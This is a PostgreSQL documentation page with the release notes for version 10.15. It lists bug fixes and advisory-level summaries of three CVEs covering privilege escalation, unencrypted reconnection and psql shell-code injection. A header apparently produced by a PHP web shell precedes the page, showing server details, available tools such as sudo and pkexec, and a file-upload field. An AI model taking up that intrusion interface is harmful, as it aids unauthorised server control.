| Server IP : 172.67.134.114 / Your IP : 162.159.115.42 Web Server : Apache/2.4.37 System : Linux almalinux.duckdns.org 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64 User : ricodeal ( 1046) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/doc/postgresql-docs/html/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>E.9. Release 10.15</title><link rel="stylesheet" type="text/css" href="stylesheet.css" /><link rev="made" href="[email protected]" /><meta name="generator" content="DocBook XSL Stylesheets Vsnapshot" /><link rel="prev" href="release-10-16.html" title="E.8. Release 10.16" /><link rel="next" href="release-10-14.html" title="E.10. Release 10.14" /></head><body><div xmlns="http://www.w3.org/TR/xhtml1/transitional" class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="5" align="center">E.9. Release 10.15</th></tr><tr><td width="10%" align="left"><a accesskey="p" href="release-10-16.html" title="E.8. Release 10.16">Prev</a> </td><td width="10%" align="left"><a accesskey="u" href="release.html" title="Appendix E. Release Notes">Up</a></td><th width="60%" align="center">Appendix E. Release Notes</th><td width="10%" align="right"><a accesskey="h" href="index.html" title="PostgreSQL 10.23 Documentation">Home</a></td><td width="10%" align="right"> <a accesskey="n" href="release-10-14.html" title="E.10. Release 10.14">Next</a></td></tr></table><hr></hr></div><div class="sect1" id="RELEASE-10-15"><div class="titlepage"><div><div><h2 class="title" style="clear: both">E.9. Release 10.15</h2></div></div></div><div class="toc"><dl class="toc"><dt><span class="sect2"><a href="release-10-15.html#id-1.11.6.13.4">E.9.1. Migration to Version 10.15</a></span></dt><dt><span class="sect2"><a href="release-10-15.html#id-1.11.6.13.5">E.9.2. Changes</a></span></dt></dl></div><p><strong>Release date: </strong>2020-11-12</p><p> This release contains a variety of fixes from 10.14.
For information about new features in major release 10, see
<a class="xref" href="release-10.html" title="E.24. Release 10">Section E.24</a>.
</p><div class="sect2" id="id-1.11.6.13.4"><div class="titlepage"><div><div><h3 class="title">E.9.1. Migration to Version 10.15</h3></div></div></div><p> A dump/restore is not required for those running 10.X.
</p><p> However, if you are upgrading from a version earlier than 10.11,
see <a class="xref" href="release-10-11.html" title="E.13. Release 10.11">Section E.13</a>.
</p></div><div class="sect2" id="id-1.11.6.13.5"><div class="titlepage"><div><div><h3 class="title">E.9.2. Changes</h3></div></div></div><div class="itemizedlist"><ul class="itemizedlist" style="list-style-type: disc; "><li class="listitem"><p> Block <code class="command">DECLARE CURSOR ... WITH HOLD</code> and firing of
deferred triggers within index expressions and materialized view
queries (Noah Misch)
</p><p> This is essentially a leak in the <span class="quote">“<span class="quote">security restricted
operation</span>”</span> sandbox mechanism. An attacker having permission
to create non-temporary SQL objects could parlay this leak to
execute arbitrary SQL code as a superuser.
</p><p> The <span class="productname">PostgreSQL</span> Project thanks
Etienne Stalmans for reporting this problem.
(CVE-2020-25695)
</p></li><li class="listitem"><p> Fix usage of complex connection-string parameters
in <span class="application">pg_dump</span>,
<span class="application">pg_restore</span>,
<span class="application">clusterdb</span>,
<span class="application">reindexdb</span>,
and <span class="application">vacuumdb</span> (Tom Lane)
</p><p> The <code class="option">-d</code> parameter
of <span class="application">pg_dump</span>
and <span class="application">pg_restore</span>, or
the <code class="option">--maintenance-db</code> parameter of the other
programs mentioned, can be a <span class="quote">“<span class="quote">connection string</span>”</span>
containing multiple connection parameters rather than just a
database name. In cases where these programs need to initiate
additional connections, such as parallel processing or processing of
multiple databases, the connection string was forgotten and just the
basic connection parameters (database name, host, port, and
username) were used for the additional connections. This could lead
to connection failures if the connection string included any other
essential information, such as non-default SSL or GSS parameters.
Worse, the connection might succeed but not be encrypted as
intended, or be vulnerable to man-in-the-middle attacks that the
intended connection parameters would have prevented.
(CVE-2020-25694)
</p></li><li class="listitem"><p> When <span class="application">psql</span>'s <code class="command">\connect</code>
command re-uses connection parameters, ensure that all
non-overridden parameters from a previous connection string are
re-used (Tom Lane)
</p><p> This avoids cases where reconnection might fail due to omission of
relevant parameters, such as non-default SSL or GSS options.
Worse, the reconnection might succeed but not be encrypted as
intended, or be vulnerable to man-in-the-middle attacks that the
intended connection parameters would have prevented.
This is largely the same problem as just cited
for <span class="application">pg_dump</span> et al,
although <span class="application">psql</span>'s behavior is more complex
since the user may intentionally override some connection
parameters.
(CVE-2020-25694)
</p></li><li class="listitem"><p> Prevent <span class="application">psql</span>'s <code class="command">\gset</code>
command from modifying specially-treated variables (Noah Misch)
</p><p> <code class="command">\gset</code> without a prefix would overwrite whatever
variables the server told it to. Thus, a compromised server could
set specially-treated variables such as <code class="varname">PROMPT1</code>,
giving the ability to execute arbitrary shell code in the user's
session.
</p><p> The <span class="productname">PostgreSQL</span> Project thanks
Nick Cleaton for reporting this problem.
(CVE-2020-25696)
</p></li><li class="listitem"><p> Prevent possible data loss from concurrent truncations of SLRU logs
(Noah Misch)
</p><p> This rare problem would manifest in later <span class="quote">“<span class="quote">apparent
wraparound</span>”</span> or <span class="quote">“<span class="quote">could not access status of
transaction</span>”</span> errors.
</p></li><li class="listitem"><p> Ensure that SLRU directories are properly fsync'd during checkpoints
(Thomas Munro)
</p><p> This prevents possible data loss in a subsequent operating system
crash.
</p></li><li class="listitem"><p> Fix <code class="command">ALTER ROLE</code> for users with
the <code class="literal">BYPASSRLS</code> attribute (Tom Lane, Stephen Frost)
</p><p> The <code class="literal">BYPASSRLS</code> attribute is only allowed to be
changed by superusers, but other <code class="command">ALTER ROLE</code>
operations, such as password changes, should be allowed with only
ordinary permission checks. The previous coding erroneously
restricted all changes on such a role to superusers.
</p></li><li class="listitem"><p> Fix handling of expressions in <code class="command">CREATE TABLE LIKE</code>
with inheritance (Tom Lane)
</p><p> If a <code class="command">CREATE TABLE</code> command uses
both <code class="literal">LIKE</code> and traditional inheritance, column
references in <code class="literal">CHECK</code> constraints and expression
indexes that came from a <code class="literal">LIKE</code> parent table tended
to get mis-numbered, resulting in wrong answers and/or bizarre error
messages. The same could happen in <code class="literal">GENERATED</code>
expressions, in branches that have that feature.
</p></li><li class="listitem"><p> Fix off-by-one conversion of negative years to BC dates
in <code class="function">to_date()</code>
and <code class="function">to_timestamp()</code> (Dar Alathar-Yemen, Tom Lane)
</p><p> Also, arrange for the combination of a negative year and an
explicit <span class="quote">“<span class="quote">BC</span>”</span> marker to cancel out and produce AD.
</p></li><li class="listitem"><p> Ensure that standby servers will archive WAL timeline history files
when <code class="varname">archive_mode</code> is set
to <code class="literal">always</code> (Grigory Smolkin, Fujii Masao)
</p><p> This oversight could lead to failure of subsequent PITR recovery
attempts.
</p></li><li class="listitem"><p> Fix <span class="quote">“<span class="quote">cache lookup failed for relation 0</span>”</span>
failures in logical replication workers (Tom Lane)
</p><p> The real-world impact is small, since the failure is unlikely, and
if it does happen the worker would just exit and be restarted.
</p></li><li class="listitem"><p> Prevent logical replication workers from sending redundant ping
requests (Tom Lane)
</p></li><li class="listitem"><p> During <span class="quote">“<span class="quote">smart</span>”</span> shutdown, don't terminate background
processes until all client (foreground) sessions are done (Tom Lane)
</p><p> The previous behavior broke parallel query processing, since the
postmaster would terminate parallel workers and refuse to launch any
new ones. It also caused autovacuum to cease functioning, which
could have dire long-term effects if the surviving client sessions
make a lot of data changes.
</p></li><li class="listitem"><p> Avoid recursive consumption of stack space while processing signals
in the postmaster (Tom Lane)
</p><p> Heavy use of parallel processing has been observed to cause
postmaster crashes due to too many concurrent signals requesting
creation of a parallel worker process.
</p></li><li class="listitem"><p> Avoid running <span class="systemitem">atexit</span> handlers when exiting
due to SIGQUIT (Kyotaro Horiguchi, Tom Lane)
</p><p> Most server processes followed this practice already, but the
archiver process was overlooked. Backends that were still waiting
for a client startup packet got it wrong, too.
</p></li><li class="listitem"><p> Avoid misoptimization of subquery qualifications that reference
apparently-constant grouping columns (Tom Lane)
</p><p> A <span class="quote">“<span class="quote">constant</span>”</span> subquery output column isn't really
constant if it is a grouping column that appears in only some of the
grouping sets.
</p></li><li class="listitem"><p> Avoid failure when SQL function inlining changes the shape of a
potentially-hashable subplan comparison expression (Tom Lane)
</p></li><li class="listitem"><p> While building or re-building an index, tolerate the appearance of
new HOT chains due to concurrent updates
(Anastasia Lubennikova, Álvaro Herrera)
</p><p> This oversight could lead to <span class="quote">“<span class="quote">failed to find parent tuple for
heap-only tuple</span>”</span> errors.
</p></li><li class="listitem"><p> Fix failure of parallel B-tree index scans when the index condition
is unsatisfiable (James Hunter)
</p></li><li class="listitem"><p> Ensure that data is detoasted before being inserted into a BRIN
index (Tomas Vondra)
</p><p> Index entries are not supposed to contain out-of-line TOAST
pointers, but BRIN didn't get that memo. This could lead to errors
like <span class="quote">“<span class="quote">missing chunk number 0 for toast value NNN</span>”</span>.
(If you are faced with such an error from an existing
index, <code class="command">REINDEX</code> should be enough to fix it.)
</p></li><li class="listitem"><p> Handle concurrent desummarization correctly during BRIN index scans
(Alexander Lakhin, Álvaro Herrera)
</p><p> Previously, if a page range was desummarized at just the wrong time,
an index scan might falsely raise an error indicating index
corruption.
</p></li><li class="listitem"><p> Fix rare <span class="quote">“<span class="quote">lost saved point in index</span>”</span> errors in scans of
multicolumn GIN indexes (Tom Lane)
</p></li><li class="listitem"><p> Fix unportable use of <code class="function">getnameinfo()</code>
in <code class="structname">pg_hba_file_rules</code> view (Tom Lane)
</p><p> On FreeBSD 11, and possibly other platforms, the
view's <code class="structfield">address</code>
and <code class="structfield">netmask</code> columns were always null due
to this error.
</p></li><li class="listitem"><p> Fix use-after-free hazard when an event trigger monitors
an <code class="command">ALTER TABLE</code> operation (Jehan-Guillaume de
Rorthais)
</p></li><li class="listitem"><p> Fix incorrect error message about inconsistent moving-aggregate
data types (Jeff Janes)
</p></li><li class="listitem"><p> Avoid lockup when a parallel worker reports a very long error
message (Vignesh C)
</p></li><li class="listitem"><p> Avoid unnecessary failure when transferring very large payloads
through shared memory queues (Markus Wanner)
</p></li><li class="listitem"><p> Fix relation cache memory leaks with RLS policies (Tom Lane)
</p></li><li class="listitem"><p> Fix small memory leak when SIGHUP processing decides that a new GUC
variable value cannot be applied without a restart (Tom Lane)
</p></li><li class="listitem"><p> Make <span class="application">libpq</span> support arbitrary-length lines
in <code class="filename">.pgpass</code> files (Tom Lane)
</p><p> This is mostly useful to allow using very long security tokens as
passwords.
</p></li><li class="listitem"><p> In <span class="application">libpq</span> for Windows,
call <code class="function">WSAStartup()</code> once per process
and <code class="function">WSACleanup()</code> not at all (Tom Lane,
Alexander Lakhin)
</p><p> Previously, <span class="application">libpq</span>
invoked <code class="function">WSAStartup()</code> at connection start
and <code class="function">WSACleanup()</code> at connection cleanup.
However, it appears that calling <code class="function">WSACleanup()</code>
can interfere with other program operations; notably, we have
observed rare failures to emit expected output to stdout. There
appear to be no ill effects from omitting the call, so do that.
(This also eliminates a performance issue from repeated DLL loads and
unloads when a program performs a series of database connections.)
</p></li><li class="listitem"><p> Fix <span class="application">ecpg</span> library's per-thread
initialization logic for Windows (Tom Lane, Alexander Lakhin)
</p><p> Multi-threaded <span class="application">ecpg</span> applications could
suffer rare misbehavior due to incorrect locking.
</p></li><li class="listitem"><p> On Windows, make <span class="application">psql</span> read the output of
a backtick command in text mode, not binary mode (Tom Lane)
</p><p> This ensures proper handling of newlines.
</p></li><li class="listitem"><p> Ensure that <span class="application">pg_dump</span> collects per-column
information about extension configuration tables (Fabrízio de
Royes Mello, Tom Lane)
</p><p> Failure to do this led to crashes when
specifying <code class="option">--inserts</code>, or underspecified (though
usually correct) <code class="command">COPY</code> commands when
using <code class="command">COPY</code> to reload the tables' data.
</p></li><li class="listitem"><p> Make <span class="application">pg_upgrade</span> check for pre-existence
of tablespace directories in the target cluster (Bruce Momjian)
</p></li><li class="listitem"><p> Fix potential memory leak in <code class="filename">contrib/pgcrypto</code>
(Michael Paquier)
</p></li><li class="listitem"><p> Add check for an unlikely failure case
in <code class="filename">contrib/pgcrypto</code> (Daniel Gustafsson)
</p></li><li class="listitem"><p> Fix recently-added <code class="type">timetz</code> test case so it works when
the USA is not observing daylight savings time (Tom Lane)
</p></li><li class="listitem"><p> Update time zone data files to <span class="application">tzdata</span>
release 2020d for DST law changes in Fiji, Morocco, Palestine, the
Canadian Yukon, Macquarie Island, and Casey Station (Antarctica);
plus historical corrections for France, Hungary, Monaco, and
Palestine.
</p></li><li class="listitem"><p> Sync our copy of the timezone library with IANA tzcode release 2020d
(Tom Lane)
</p><p> This absorbs upstream's change of <span class="application">zic</span>'s
default output option from <span class="quote">“<span class="quote">fat</span>”</span>
to <span class="quote">“<span class="quote">slim</span>”</span>. That's just cosmetic for our purposes, as
we continue to select the <span class="quote">“<span class="quote">fat</span>”</span> mode in pre-v13
branches. This change also ensures
that <code class="function">strftime()</code> does not
change <code class="varname">errno</code> unless it fails.
</p></li></ul></div></div></div><div xmlns="http://www.w3.org/TR/xhtml1/transitional" class="navfooter"><hr></hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="release-10-16.html" title="E.8. Release 10.16">Prev</a> </td><td width="20%" align="center"><a accesskey="u" href="release.html" title="Appendix E. Release Notes">Up</a></td><td width="40%" align="right"> <a accesskey="n" href="release-10-14.html" title="E.10. Release 10.14">Next</a></td></tr><tr><td width="40%" align="left" valign="top">E.8. Release 10.16 </td><td width="20%" align="center"><a accesskey="h" href="index.html" title="PostgreSQL 10.23 Documentation">Home</a></td><td width="40%" align="right" valign="top"> E.10. Release 10.14</td></tr></table></div></body></html>